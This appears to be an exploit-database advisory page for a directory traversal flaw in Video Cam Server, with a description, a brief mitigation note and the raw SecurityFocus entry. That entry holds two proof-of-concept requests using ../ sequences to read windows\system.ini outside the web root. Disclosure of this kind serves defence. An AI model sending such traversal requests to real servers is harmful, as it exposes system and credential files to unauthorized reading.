header-logo
Suggest Exploit
vendor:
Video Cam Server
by:
5.5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Video Cam Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Video Cam Server Directory Traversal Vulnerability

Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. By sending a specially crafted request, an attacker can traverse directories and access sensitive files on the system. In this case, the attacker is attempting to read the 'system.ini' file located in the Windows directory.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper access controls. Additionally, restricting access to sensitive files and directories can help prevent unauthorized access.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13456/info

Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. 

http://www.example.com/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
GET /../../../../../../../../../../../windows/system.ini HTTP/1.1

Navigation

Suggest Exploit

Services By CQR